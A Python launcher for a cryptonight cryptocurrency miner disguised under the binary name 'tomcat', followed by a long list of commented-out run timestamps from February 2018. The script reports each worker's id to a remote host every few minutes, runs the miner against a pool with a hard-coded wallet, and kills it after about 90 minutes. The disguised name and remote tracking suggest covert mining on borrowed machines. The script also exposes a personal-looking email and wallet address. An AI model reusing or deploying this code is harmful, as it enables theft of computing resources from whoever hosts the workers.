import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 16:29:05.321378
#2018-02-17 18:16:05.074386
#2018-02-17 20:03:05.142396
#2018-02-17 21:52:04.063140
#2018-02-17 23:37:03.400724
#2018-02-18 01:26:06.556338
#2018-02-18 03:13:07.566173
#2018-02-18 05:03:05.343118
#2018-02-18 06:54:01.436570
#2018-02-18 08:42:05.120565
#2018-02-18 10:28:05.510197
#2018-02-18 12:14:03.976868
#2018-02-18 14:01:03.762513
#2018-02-18 15:51:02.005192
#2018-02-18 17:41:04.851681
#2018-02-18 19:28:05.981152
#2018-02-18 21:13:01.379869
#2018-02-18 22:59:07.250796
#2018-02-19 00:47:05.886747
#2018-02-19 02:34:06.879443
#2018-02-19 04:20:06.311118
#2018-02-19 06:05:06.830194
#2018-02-19 07:53:05.052327
#2018-02-19 09:43:05.270877
#2018-02-19 11:33:04.430474
#2018-02-19 13:20:07.631934
#2018-02-19 15:09:06.138527
#2018-02-19 16:56:01.892597
#2018-02-19 18:42:01.806365
#2018-02-19 20:31:08.136285
#2018-02-19 22:18:06.283676
#2018-02-20 00:03:05.494157
#2018-02-20 01:50:07.872807
#2018-02-20 03:39:05.845366
#2018-02-20 05:25:06.289606
#2018-02-20 07:09:06.086484
#2018-02-20 08:55:01.347239
#2018-02-20 10:38:07.538267
#2018-02-20 12:24:04.226269
#2018-02-20 14:11:02.248884
#2018-02-20 15:54:07.767954
#2018-02-20 17:42:10.779764
#2018-02-20 19:32:08.222416
#2018-02-20 21:19:05.396030
#2018-02-20 23:04:07.519806
#2018-02-21 00:49:04.990649
#2018-02-21 02:35:08.985082
#2018-02-21 04:25:04.615684
#2018-02-21 06:13:03.635542
#2018-02-21 07:59:01.906962
#2018-02-21 09:45:07.123471
#2018-02-21 11:34:10.661936
#2018-02-21 13:22:08.494770
#2018-02-21 15:06:10.146747
#2018-02-21 16:55:09.970504
#2018-02-21 18:45:10.651864
#2018-02-21 20:34:03.974510
#2018-02-21 22:19:08.426564
#2018-02-22 00:08:01.548149
#2018-02-22 01:57:05.861082
#2018-02-22 03:43:06.753234
#2018-02-22 05:30:06.975347
#2018-02-22 07:15:04.515177
#2018-02-22 09:01:07.662302
#2018-02-22 10:49:02.180977
#2018-02-22 12:35:04.702268
#2018-02-22 14:19:08.677085
#2018-02-22 16:07:06.032599
#2018-02-22 17:53:09.623850
#2018-02-22 19:41:02.171380
#2018-02-22 21:32:06.841269
#2018-02-22 23:19:06.017274
#2018-02-23 01:06:04.396592
#2018-02-23 02:53:05.435805
#2018-02-23 04:40:07.221251
#2018-02-23 06:26:06.297817
#2018-02-23 08:13:06.784880
#2018-02-23 10:31:06.673921
#2018-02-23 12:22:05.937457
#2018-02-23 14:11:02.086131
#2018-02-23 16:01:06.940074
#2018-02-23 17:47:09.088106
#2018-02-23 19:33:07.364997
#2018-02-23 21:16:08.299144
#2018-02-23 23:05:08.369813
#2018-02-24 00:50:07.190942
#2018-02-24 02:36:02.196464
#2018-02-24 04:29:05.639326
#2018-02-24 06:15:06.271472
#2018-02-24 08:03:03.795147
#2018-02-24 09:47:05.277738
#2018-02-24 11:43:01.704321
#2018-02-24 13:34:04.390893
#2018-02-24 15:21:05.685302
#2018-02-24 17:10:06.025627
#2018-02-24 19:01:06.977799
#2018-02-24 20:49:02.018870
#2018-02-25 01:11:06.404879
#2018-02-25 04:58:01.240835
#2018-02-25 09:33:01.800060